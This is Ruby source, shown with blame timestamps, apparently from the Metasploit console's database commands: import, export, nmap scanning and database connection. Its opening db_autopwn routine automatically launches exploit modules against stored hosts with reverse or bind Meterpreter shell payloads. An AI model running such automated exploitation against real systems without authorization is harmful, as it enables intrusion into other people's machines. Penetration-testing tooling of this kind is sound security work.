2006-09-17 22:07:52 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2010-06-25 22:32:39 +00:00
|
|
|
ilog("db_autopwn: Matched #{matches.length} modules")
|
2008-11-18 22:01:15 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
idx = 0
|
|
|
|
matches.each_key do |xref|
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
idx += 1
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
begin
|
|
|
|
mod = nil
|
|
|
|
|
|
|
|
if ((mod = framework.modules.create(xref[3])) == nil)
|
|
|
|
print_status("Failed to initialize #{xref[3]}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# The code is just a proof-of-concept and will be expanded in the future
|
|
|
|
#
|
|
|
|
if (mode & PWN_EXPL != 0)
|
|
|
|
|
|
|
|
mod.datastore['RHOST'] = xref[2]
|
2009-12-03 01:36:17 +00:00
|
|
|
|
|
|
|
if(xref[0])
|
|
|
|
mod.datastore['RPORT'] = xref[0].to_s
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
|
|
|
if (code == :bind)
|
|
|
|
mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s
|
2009-03-28 21:51:35 +00:00
|
|
|
if(mod.fullname =~ /\/windows\//)
|
|
|
|
mod.datastore['PAYLOAD'] = 'windows/meterpreter/bind_tcp'
|
|
|
|
else
|
|
|
|
mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp'
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
if (code == :conn)
|
|
|
|
mod.datastore['LHOST'] = Rex::Socket.source_address(xref[2])
|
|
|
|
mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
if (mod.datastore['LHOST'] == '127.0.0.1')
|
|
|
|
print_status("Failed to determine listener address for target #{xref[2]}...")
|
|
|
|
next
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:51:35 +00:00
|
|
|
if(mod.fullname =~ /\/windows\//)
|
|
|
|
mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp'
|
|
|
|
else
|
|
|
|
mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
|
|
|
|
2008-11-18 22:01:15 +00:00
|
|
|
if(framework.jobs.keys.length >= mjob)
|
|
|
|
print_status("Job limit reached, waiting on modules to finish...")
|
|
|
|
while(framework.jobs.keys.length >= mjob)
|
2010-05-20 20:42:17 +00:00
|
|
|
::IO.select(nil, nil, nil, 0.25)
|
2008-11-18 22:01:15 +00:00
|
|
|
end
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-12-03 01:36:17 +00:00
|
|
|
print_status("(#{idx}/#{matches.length} [#{framework.sessions.length} sessions]): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2010-11-12 06:19:49 +00:00
|
|
|
autopwn_jobs << framework.threads.spawn("AutoPwnJob#{xref[3]}", false, mod) do |xmod|
|
2010-03-24 00:11:21 +00:00
|
|
|
begin
|
|
|
|
stime = Time.now.to_f
|
|
|
|
::Timeout.timeout(maxtime) do
|
|
|
|
inp = (mode & PWN_SLNT != 0) ? nil : driver.input
|
|
|
|
out = (mode & PWN_SLNT != 0) ? nil : driver.output
|
|
|
|
|
|
|
|
case xmod.type
|
|
|
|
when MODULE_EXPLOIT
|
|
|
|
xmod.exploit_simple(
|
|
|
|
'Payload' => xmod.datastore['PAYLOAD'],
|
|
|
|
'LocalInput' => inp,
|
|
|
|
'LocalOutput' => out,
|
|
|
|
'RunAsJob' => false)
|
|
|
|
when MODULE_AUX
|
|
|
|
xmod.run_simple(
|
|
|
|
'LocalInput' => inp,
|
|
|
|
'LocalOutput' => out,
|
|
|
|
'RunAsJob' => false)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
rescue ::Timeout::Error
|
|
|
|
print_status(" >> autopwn module timeout from #{xmod.fullname} after #{Time.now.to_f - stime} seconds")
|
|
|
|
rescue ::Exception
|
|
|
|
print_status(" >> autopwn exception during launch from #{xmod.fullname}: #{$!} ")
|
2006-09-17 22:07:52 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2008-11-18 22:01:15 +00:00
|
|
|
rescue ::Interrupt
|
|
|
|
raise $!
|
2010-03-24 00:11:21 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
rescue ::Exception
|
2008-12-19 07:11:08 +00:00
|
|
|
print_status(" >> autopwn exception from #{xref[3]}: #{$!} #{$!.backtrace}")
|
2006-09-17 22:07:52 +00:00
|
|
|
end
|
2008-11-18 22:01:15 +00:00
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2010-03-18 18:26:53 +00:00
|
|
|
# Wait on all the jobs we just spawned
|
|
|
|
while (not autopwn_jobs.empty?)
|
|
|
|
# All running jobs are stored in framework.jobs. If it's
|
|
|
|
# not in this list, it must have completed.
|
2010-03-24 00:11:21 +00:00
|
|
|
autopwn_jobs.delete_if { |j| not j.alive? }
|
2009-12-03 01:36:17 +00:00
|
|
|
|
2010-03-18 18:26:53 +00:00
|
|
|
print_status("(#{matches.length}/#{matches.length} [#{framework.sessions.length} sessions]): Waiting on #{autopwn_jobs.length} launched modules to finish execution...")
|
2010-05-20 20:42:17 +00:00
|
|
|
::IO.select(nil, nil, nil, 5.0)
|
2009-12-03 01:36:17 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
if (mode & PWN_SHOW != 0 and mode & PWN_EXPL != 0)
|
|
|
|
print_status("The autopwn command has completed with #{framework.sessions.length} sessions")
|
|
|
|
if(framework.sessions.length > 0)
|
|
|
|
print_status("Enter sessions -i [ID] to interact with a given session ID")
|
|
|
|
print_status("")
|
|
|
|
print_status("=" * 80)
|
|
|
|
driver.run_single("sessions -l -v")
|
|
|
|
print_status("=" * 80)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
print_line("")
|
2006-09-17 22:07:52 +00:00
|
|
|
# EOM
|
|
|
|
end
|
|
|
|
|
2010-05-17 04:39:07 +00:00
|
|
|
#
|
|
|
|
# Determine if an IP address is inside a given range
|
|
|
|
#
|
|
|
|
def range_include?(ranges, addr)
|
|
|
|
ranges.each do |range|
|
|
|
|
return true if range.include? addr
|
|
|
|
end
|
|
|
|
false
|
|
|
|
end
|
|
|
|
|
2010-05-24 23:38:45 +00:00
|
|
|
def cmd_db_import_tabs(str, words)
|
|
|
|
tab_complete_filenames(str, words)
|
|
|
|
end
|
|
|
|
|
2011-07-19 06:09:10 +00:00
|
|
|
# Informs about the superior cmd_db_import function.
|
2010-09-06 18:33:17 +00:00
|
|
|
def warn_about_db_import(arg)
|
2010-10-17 04:50:15 +00:00
|
|
|
return nil unless caller[0][/:in `cmd_(.*)'/] # `fix higlighting
|
2010-09-06 18:33:17 +00:00
|
|
|
triggering_function = $1
|
|
|
|
print_error "The command '#{triggering_function}' is deprecated; use 'db_import #{arg}' instead."
|
|
|
|
end
|
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_import_help
|
|
|
|
print_line "Usage: db_import <filename> [file2...]"
|
|
|
|
print_line
|
|
|
|
print_line "filenames can be globs like *.xml, or **/*.xml which will search recursively"
|
|
|
|
print_line
|
|
|
|
end
|
|
|
|
|
2009-09-05 04:29:53 +00:00
|
|
|
#
|
2010-01-07 19:06:29 +00:00
|
|
|
# Generic import that automatically detects the file type
|
2009-09-05 04:29:53 +00:00
|
|
|
#
|
2010-01-07 19:06:29 +00:00
|
|
|
def cmd_db_import(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2010-01-07 21:51:18 +00:00
|
|
|
if (args.include?("-h") or not (args and args.length > 0))
|
2011-04-16 22:49:31 +00:00
|
|
|
cmd_db_import_help
|
2010-01-07 19:06:29 +00:00
|
|
|
return
|
2009-09-05 04:29:53 +00:00
|
|
|
end
|
2010-01-07 21:51:18 +00:00
|
|
|
args.each { |glob|
|
2010-01-10 17:49:28 +00:00
|
|
|
files = Dir.glob(File.expand_path(glob))
|
|
|
|
if files.empty?
|
|
|
|
print_error("No such file #{glob}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
files.each { |filename|
|
2010-01-07 21:51:18 +00:00
|
|
|
if (not File.readable?(filename))
|
|
|
|
print_error("Could not read file #{filename}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
begin
|
2011-04-20 18:33:27 +00:00
|
|
|
warnings = 0
|
2010-06-08 19:16:20 +00:00
|
|
|
framework.db.import_file(:filename => filename) do |type,data|
|
|
|
|
case type
|
2011-05-24 19:40:50 +00:00
|
|
|
when :debug
|
|
|
|
print_error("DEBUG: #{data.inspect}")
|
2011-05-27 17:30:11 +00:00
|
|
|
when :vuln
|
|
|
|
inst = data[1] == 1 ? "instance" : "instances"
|
|
|
|
print_status("Importing vulnerability '#{data[0]}' (#{data[1]} #{inst})")
|
2010-06-08 19:16:20 +00:00
|
|
|
when :filetype
|
|
|
|
print_status("Importing '#{data}' data")
|
2011-05-24 19:40:50 +00:00
|
|
|
when :parser
|
|
|
|
print_status("Import: Parsing with '#{data}'")
|
2010-06-08 19:16:20 +00:00
|
|
|
when :address
|
|
|
|
print_status("Importing host #{data}")
|
2010-12-12 17:44:48 +00:00
|
|
|
when :service
|
|
|
|
print_status("Importing service #{data}")
|
|
|
|
when :msf_loot
|
2010-06-11 18:56:16 +00:00
|
|
|
print_status("Importing loot #{data}")
|
2010-12-12 17:44:48 +00:00
|
|
|
when :msf_task
|
2010-06-11 18:56:16 +00:00
|
|
|
print_status("Importing task #{data}")
|
2010-12-12 17:44:48 +00:00
|
|
|
when :msf_report
|
2010-06-11 18:56:16 +00:00
|
|
|
print_status("Importing report #{data}")
|
2010-12-16 21:36:00 +00:00
|
|
|
when :pcap_count
|
|
|
|
print_status("Import: #{data} packets processed")
|
|
|
|
when :record_count
|
|
|
|
print_status("Import: #{data[1]} records processed")
|
2011-04-20 18:33:27 +00:00
|
|
|
when :warning
|
|
|
|
print_error("")
|
|
|
|
data.split("\n").each do |line|
|
|
|
|
print_error(line)
|
|
|
|
end
|
|
|
|
print_error("")
|
|
|
|
warnings += 1
|
2010-06-08 19:16:20 +00:00
|
|
|
end
|
|
|
|
end
|
2010-01-07 21:51:18 +00:00
|
|
|
print_status("Successfully imported #{filename}")
|
2011-04-20 18:33:27 +00:00
|
|
|
|
|
|
|
print_error("Please note that there were #{warnings} warnings") if warnings > 1
|
|
|
|
print_error("Please note that there was one warning") if warnings == 1
|
|
|
|
|
2010-01-07 21:51:18 +00:00
|
|
|
rescue DBImportError
|
2010-01-10 17:49:28 +00:00
|
|
|
print_error("Failed to import #{filename}: #{$!}")
|
|
|
|
elog("Failed to import #{filename}: #{$!.class}: #{$!}")
|
2010-01-07 21:51:18 +00:00
|
|
|
dlog("Call stack: #{$@.join("\n")}", LEV_3)
|
|
|
|
next
|
2010-09-27 15:40:33 +00:00
|
|
|
rescue REXML::ParseException => e
|
|
|
|
print_error("Failed to import #{filename} due to malformed XML:")
|
|
|
|
print_error "#{$!.class}: #{$!}"
|
|
|
|
elog("Failed to import #{filename}: #{$!.class}: #{$!}")
|
|
|
|
dlog("Call stack: #{$@.join("\n")}", LEV_3)
|
|
|
|
next
|
2010-01-07 21:51:18 +00:00
|
|
|
end
|
|
|
|
}
|
|
|
|
}
|
2009-09-05 04:29:53 +00:00
|
|
|
end
|
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_export_help
|
|
|
|
# Like db_hosts and db_services, this creates a list of columns, so
|
|
|
|
# use its -h
|
|
|
|
cmd_db_export("-h")
|
|
|
|
end
|
|
|
|
|
2010-10-17 04:50:15 +00:00
|
|
|
#
|
|
|
|
# Export an XML
|
|
|
|
#
|
|
|
|
def cmd_db_export(*args)
|
|
|
|
return unless active?
|
|
|
|
|
2010-11-02 19:13:15 +00:00
|
|
|
export_formats = %W{xml pwdump}
|
2010-10-17 04:50:15 +00:00
|
|
|
format = 'xml'
|
|
|
|
output = nil
|
2010-11-02 22:11:45 +00:00
|
|
|
|
2010-10-17 04:50:15 +00:00
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
|
|
|
when '-h','--help'
|
|
|
|
print_line("Usage:")
|
2010-11-02 22:11:45 +00:00
|
|
|
print_line(" db_export -f <format> [-a] [filename]")
|
2010-11-02 19:13:15 +00:00
|
|
|
print_line(" Format can be one of: #{export_formats.join(", ")}")
|
2010-10-17 04:50:15 +00:00
|
|
|
when '-f','--format'
|
|
|
|
format = args.shift.to_s.downcase
|
|
|
|
else
|
|
|
|
output = arg
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if not output
|
|
|
|
print_error("No output file was specified")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2010-11-02 19:13:15 +00:00
|
|
|
if not export_formats.include?(format)
|
2010-10-17 04:50:15 +00:00
|
|
|
print_error("Unsupported file format: #{format}")
|
2010-11-02 22:11:45 +00:00
|
|
|
print_error("Unsupported file format: '#{format}'. Must be one of: #{export_formats.join(", ")}")
|
2010-10-17 04:50:15 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Starting export of workspace #{framework.db.workspace.name} to #{output} [ #{format} ]...")
|
|
|
|
exporter = Msf::DBManager::Export.new(framework.db.workspace)
|
2010-11-02 19:13:15 +00:00
|
|
|
|
|
|
|
exporter.send("to_#{format}_file".intern,output) do |mtype, mstatus, mname|
|
2010-10-17 04:50:15 +00:00
|
|
|
if mtype == :status
|
|
|
|
if mstatus == "start"
|
|
|
|
print_status(" >> Starting export of #{mname}")
|
|
|
|
end
|
|
|
|
if mstatus == "complete"
|
|
|
|
print_status(" >> Finished export of #{mname}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
print_status("Finished export of workspace #{framework.db.workspace.name} to #{output} [ #{format} ]...")
|
2010-03-03 00:34:16 +00:00
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# Import Nmap data from a file
|
|
|
|
#
|
|
|
|
def cmd_db_nmap(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2006-09-17 22:07:52 +00:00
|
|
|
if (args.length == 0)
|
|
|
|
print_status("Usage: db_nmap [nmap options]")
|
|
|
|
return
|
2006-09-16 20:08:13 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
|
|
|
nmap =
|
|
|
|
Rex::FileUtils.find_full_path("nmap") ||
|
2007-12-31 04:05:51 +00:00
|
|
|
Rex::FileUtils.find_full_path("nmap.exe")
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2010-01-07 19:06:29 +00:00
|
|
|
if (not nmap)
|
2007-12-31 04:05:51 +00:00
|
|
|
print_error("The nmap executable could not be found")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
fd = Tempfile.new('dbnmap')
|
2010-10-12 01:48:42 +00:00
|
|
|
fd.binmode
|
|
|
|
|
2009-11-06 17:27:28 +00:00
|
|
|
fo = Tempfile.new('dbnmap')
|
2010-10-12 01:48:42 +00:00
|
|
|
fo.binmode
|
2008-09-26 05:01:18 +00:00
|
|
|
|
2009-11-06 16:43:14 +00:00
|
|
|
# When executing native Nmap in Cygwin, expand the Cygwin path to a Win32 path
|
2009-11-06 16:03:40 +00:00
|
|
|
if(Rex::Compat.is_cygwin and nmap =~ /cygdrive/)
|
2009-11-06 16:43:14 +00:00
|
|
|
# Custom function needed because cygpath breaks on 8.3 dirs
|
|
|
|
tout = Rex::Compat.cygwin_to_win32(fd.path)
|
2009-11-06 17:27:28 +00:00
|
|
|
fout = Rex::Compat.cygwin_to_win32(fo.path)
|
2009-11-06 16:43:14 +00:00
|
|
|
args.push('-oX', tout)
|
2009-11-06 17:27:28 +00:00
|
|
|
args.push('-oN', fout)
|
2009-09-04 15:04:06 +00:00
|
|
|
else
|
|
|
|
args.push('-oX', fd.path)
|
2009-11-06 17:27:28 +00:00
|
|
|
args.push('-oN', fo.path)
|
2009-09-04 15:04:06 +00:00
|
|
|
end
|
2009-11-06 20:15:12 +00:00
|
|
|
|
2011-03-17 04:12:51 +00:00
|
|
|
begin
|
|
|
|
nmap_pipe = ::Open3::popen3([nmap, "nmap"], *args)
|
|
|
|
temp_nmap_threads = []
|
|
|
|
temp_nmap_threads << framework.threads.spawn("db_nmap-Stdout", false, nmap_pipe[1]) do |np_1|
|
|
|
|
np_1.each_line do |nmap_out|
|
|
|
|
next if nmap_out.strip.empty?
|
|
|
|
print_status "Nmap: #{nmap_out.strip}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
temp_nmap_threads << framework.threads.spawn("db_nmap-Stderr", false, nmap_pipe[2]) do |np_2|
|
2011-07-19 06:09:10 +00:00
|
|
|
np_2.each_line do |nmap_err|
|
2011-03-17 04:12:51 +00:00
|
|
|
next if nmap_err.strip.empty?
|
2011-07-19 06:09:10 +00:00
|
|
|
print_status "Nmap: '#{nmap_err.strip}'"
|
2011-03-17 04:12:51 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
temp_nmap_threads.map {|t| t.join rescue nil}
|
|
|
|
nmap_pipe.each {|p| p.close rescue nil}
|
|
|
|
rescue ::IOError
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2010-03-03 04:58:12 +00:00
|
|
|
fo.close(true)
|
2010-06-04 14:57:58 +00:00
|
|
|
framework.db.import_nmap_xml_file(:filename => fd.path)
|
2010-03-03 04:58:12 +00:00
|
|
|
fd.close(true)
|
2006-09-16 20:08:13 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
#
|
|
|
|
# Database management
|
|
|
|
#
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def db_check_driver
|
|
|
|
if(not framework.db.driver)
|
|
|
|
print_error("No database driver has been specified")
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
true
|
|
|
|
end
|
|
|
|
|
2010-05-10 09:23:53 +00:00
|
|
|
#
|
|
|
|
# Is everything working?
|
|
|
|
#
|
|
|
|
def cmd_db_status(*args)
|
|
|
|
if framework.db.driver
|
|
|
|
if ActiveRecord::Base.connected? and ActiveRecord::Base.connection.active?
|
|
|
|
if ActiveRecord::Base.connection.respond_to? :current_database
|
|
|
|
cdb = ActiveRecord::Base.connection.current_database
|
|
|
|
end
|
|
|
|
print_status("#{framework.db.driver} connected to #{cdb}")
|
|
|
|
else
|
|
|
|
print_status("#{framework.db.driver} selected, no connection")
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_status("No driver selected")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def cmd_db_driver(*args)
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if(args[0])
|
2009-11-14 21:41:38 +00:00
|
|
|
if(args[0] == "-h" || args[0] == "--help")
|
2009-03-28 21:42:30 +00:00
|
|
|
print_status("Usage: db_driver [driver-name]")
|
|
|
|
return
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if(framework.db.drivers.include?(args[0]))
|
|
|
|
framework.db.driver = args[0]
|
|
|
|
print_status("Using database driver #{args[0]}")
|
|
|
|
else
|
|
|
|
print_error("Invalid driver specified")
|
|
|
|
end
|
|
|
|
return
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if(framework.db.driver)
|
|
|
|
print_status(" Active Driver: #{framework.db.driver}")
|
|
|
|
else
|
|
|
|
print_status("No Active Driver")
|
|
|
|
end
|
|
|
|
print_status(" Available: #{framework.db.drivers.join(", ")}")
|
2009-11-14 21:41:38 +00:00
|
|
|
print_line("")
|
|
|
|
|
|
|
|
if ! framework.db.drivers.include?('mysql')
|
|
|
|
print_status(" DB Support: Enable the mysql driver with the following command:")
|
|
|
|
print_status(" $ gem install mysql")
|
2009-12-14 23:40:21 +00:00
|
|
|
print_status(" This gem requires mysqlclient headers, which can be installed on Ubuntu with:")
|
|
|
|
print_status(" $ sudo apt-get install libmysqlclient-dev")
|
2009-11-14 21:41:38 +00:00
|
|
|
print_line("")
|
|
|
|
end
|
|
|
|
|
|
|
|
if ! framework.db.drivers.include?('postgresql')
|
|
|
|
print_status(" DB Support: Enable the postgresql driver with the following command:")
|
2010-04-07 16:21:14 +00:00
|
|
|
print_status(" * This requires libpq-dev and a build environment")
|
2010-05-02 02:07:30 +00:00
|
|
|
print_status(" $ gem install postgres")
|
|
|
|
print_status(" $ gem install pg # is an alternative that may work")
|
2009-11-14 21:41:38 +00:00
|
|
|
print_line("")
|
|
|
|
end
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def cmd_db_driver_tabs(str, words)
|
|
|
|
return framework.db.drivers
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def cmd_db_create(*args)
|
|
|
|
return if not db_check_driver
|
2010-05-02 02:07:30 +00:00
|
|
|
print_error("")
|
2010-05-10 06:27:47 +00:00
|
|
|
print_error("Warning: The db_create command is deprecated, use db_connect instead.")
|
2010-05-17 15:20:30 +00:00
|
|
|
print_error(" The database and schema will be created automatically by")
|
|
|
|
print_error(" db_connect. If db_connect fails to create the database, create")
|
|
|
|
print_error(" it manually with your DBMS's administration tools.")
|
2010-05-02 02:07:30 +00:00
|
|
|
print_error("")
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
meth = "db_create_#{framework.db.driver}"
|
|
|
|
if(self.respond_to?(meth))
|
|
|
|
self.send(meth, *args)
|
|
|
|
else
|
2009-04-12 07:09:03 +00:00
|
|
|
print_error("This database driver #{framework.db.driver} is not currently supported")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def cmd_db_destroy(*args)
|
|
|
|
return if not db_check_driver
|
2009-11-14 21:41:38 +00:00
|
|
|
|
|
|
|
if(args[0] and (args[0] == "-h" || args[0] == "--help"))
|
2010-04-07 16:09:01 +00:00
|
|
|
print_status("Usage: db_destroy [<user:pass>@<host:port>/<database>]")
|
2009-11-14 21:41:38 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
meth = "db_destroy_#{framework.db.driver}"
|
|
|
|
if(self.respond_to?(meth))
|
|
|
|
self.send(meth, *args)
|
|
|
|
else
|
2009-04-12 07:09:03 +00:00
|
|
|
print_error("This database driver #{framework.db.driver} is not currently supported")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_connect_help
|
|
|
|
# Help is specific to each driver
|
|
|
|
cmd_db_connect("-h")
|
|
|
|
end
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def cmd_db_connect(*args)
|
|
|
|
return if not db_check_driver
|
2010-10-23 23:20:43 +00:00
|
|
|
if (args[0] == "-y")
|
|
|
|
if (args[1] and not File.exists? File.expand_path(args[1]))
|
|
|
|
print_error("File not found")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
file = args[1] || File.join(Msf::Config.get_config_root, "database.yml")
|
|
|
|
if (File.exists? File.expand_path(file))
|
|
|
|
db = YAML.load(File.read(file))['production']
|
|
|
|
cmd_db_driver(db['adapter'])
|
|
|
|
framework.db.connect(db)
|
|
|
|
return
|
|
|
|
end
|
|
|
|
end
|
2009-03-28 21:42:30 +00:00
|
|
|
meth = "db_connect_#{framework.db.driver}"
|
|
|
|
if(self.respond_to?(meth))
|
|
|
|
self.send(meth, *args)
|
|
|
|
else
|
2009-04-12 07:09:03 +00:00
|
|
|
print_error("This database driver #{framework.db.driver} is not currently supported")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_disconnect_help
|
|
|
|
print_line "Usage: db_disconnect"
|
|
|
|
print_line
|
|
|
|
print_line "Disconnect from the database."
|
|
|
|
print_line
|
|
|
|
end
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def cmd_db_disconnect(*args)
|
|
|
|
return if not db_check_driver
|
2009-11-14 21:41:38 +00:00
|
|
|
|
|
|
|
if(args[0] and (args[0] == "-h" || args[0] == "--help"))
|
2011-04-16 22:49:31 +00:00
|
|
|
cmd_db_disconnect_help
|
2009-11-14 21:41:38 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2010-05-17 04:49:17 +00:00
|
|
|
if (framework.db)
|
|
|
|
framework.db.disconnect()
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2011-04-22 05:08:08 +00:00
|
|
|
#
|
|
|
|
# Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses
|
|
|
|
#
|
|
|
|
# This stores all the addresses to a temporary file and utilizes the
|
|
|
|
# <pre>file:/tmp/filename</pre> syntax to confer the addrs. +rhosts+
|
|
|
|
# should be an Array. NOTE: the temporary file is *not* deleted
|
|
|
|
# automatically.
|
|
|
|
#
|
|
|
|
def set_rhosts_from_addrs(rhosts)
|
|
|
|
if rhosts.empty?
|
|
|
|
print_status "The list is empty, cowardly refusing to set RHOSTS"
|
|
|
|
return
|
|
|
|
end
|
|
|
|
if active_module
|
|
|
|
mydatastore = active_module.datastore
|
|
|
|
else
|
|
|
|
# if there is no module in use set the list to the global variable
|
|
|
|
mydatastore = self.framework.datastore
|
|
|
|
end
|
2011-04-22 18:31:55 +00:00
|
|
|
|
|
|
|
if rhosts.length > 5
|
|
|
|
# Lots of hosts makes 'show options' wrap which is difficult to
|
|
|
|
# read, store to a temp file
|
|
|
|
rhosts_file = Rex::Quickfile.new("msf-db-rhosts-")
|
|
|
|
mydatastore['RHOSTS'] = 'file:'+rhosts_file.path
|
|
|
|
# create the output file and assign it to the RHOSTS variable
|
|
|
|
rhosts_file.write(rhosts.join("\n")+"\n")
|
|
|
|
rhosts_file.close
|
|
|
|
else
|
|
|
|
# For short lists, just set it directly
|
|
|
|
mydatastore['RHOSTS'] = rhosts.join(" ")
|
|
|
|
end
|
2011-04-22 05:08:08 +00:00
|
|
|
|
|
|
|
print_line "RHOSTS => #{mydatastore['RHOSTS']}"
|
2011-07-19 06:09:10 +00:00
|
|
|
print_line
|
2011-04-22 05:08:08 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
2009-11-14 21:41:38 +00:00
|
|
|
def db_find_tools(tools)
|
|
|
|
found = true
|
|
|
|
missed = []
|
|
|
|
tools.each do |name|
|
|
|
|
if(! Rex::FileUtils.find_full_path(name))
|
|
|
|
missed << name
|
|
|
|
end
|
|
|
|
end
|
|
|
|
if(not missed.empty?)
|
|
|
|
print_error("This database command requires the following tools to be installed: #{missed.join(", ")}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
true
|
|
|
|
end
|
2009-12-10 15:12:59 +00:00
|
|
|
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
#
|
|
|
|
# Database management: MySQL
|
|
|
|
#
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
#
|
|
|
|
# Connect to an existing MySQL database
|
|
|
|
#
|
|
|
|
def db_connect_mysql(*args)
|
2009-11-14 21:41:38 +00:00
|
|
|
if(args[0] == nil or args[0] == "-h" or args[0] == "--help")
|
|
|
|
print_status(" Usage: db_connect <user:pass>@<host:port>/<database>")
|
2010-10-23 23:20:43 +00:00
|
|
|
print_status(" OR: db_connect -y [path/to/database.yml]")
|
2009-11-14 21:41:38 +00:00
|
|
|
print_status("Examples:")
|
|
|
|
print_status(" db_connect user@metasploit3")
|
|
|
|
print_status(" db_connect user:pass@192.168.0.2/metasploit3")
|
|
|
|
print_status(" db_connect user:pass@192.168.0.2:1500/metasploit3")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
info = db_parse_db_uri_mysql(args[0])
|
|
|
|
opts = { 'adapter' => 'mysql' }
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
opts['username'] = info[:user] if (info[:user])
|
|
|
|
opts['password'] = info[:pass] if (info[:pass])
|
|
|
|
opts['database'] = info[:name]
|
|
|
|
opts['host'] = info[:host] if (info[:host])
|
|
|
|
opts['port'] = info[:port] if (info[:port])
|
|
